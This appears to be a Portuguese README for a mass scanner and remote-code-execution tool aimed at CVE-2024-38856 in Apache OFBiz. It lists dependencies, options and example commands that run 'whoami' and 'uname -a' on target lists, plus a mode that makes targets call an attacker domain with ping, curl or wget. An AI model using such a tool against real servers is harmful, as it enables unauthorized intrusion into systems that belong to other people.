
Realize com o Massivo Scanner de Zero-Day & RCE do Apache OFBiz
Este script foi projetado para escanear a vulnerabilidade CVE-2024-38856 em aplicações Apache Ofbiz, que pode permitir execução remota de código. Ele envia requisições HTTP POST para caminhos específicos dentro da aplicação Ofbiz com payloads maliciosos para explorar a vulnerabilidade.

coloredlogs para logs coloridos e fáceis de lerrequestscoloredlogscoloramaargparseurllib3Você pode instalar as dependências necessárias usando pip:
pip install requests coloredlogs colorama argparse urllib3
Para executar o script, use o seguinte comando:
python script_name.py [opções]
-t, --threads: Número de threads a serem usadas (padrão: 1)-p, --port: Porta alvo-c, --command: Comando a executar-s, --scan: Realizar uma varredura com ping, curl e wget-d, --domain: Domínio (domínio atacante) para escanear com ping, curl e wget-f, --file: Arquivo contendo uma lista de alvos no formato http(s)://alvo,portaEscanear alvos com um comando:
python script_name.py -f targets.txt -c "whoami"
python script_name.py -s -d example.com -p 80
python script_name.py -f targets.txt -c "uname -a"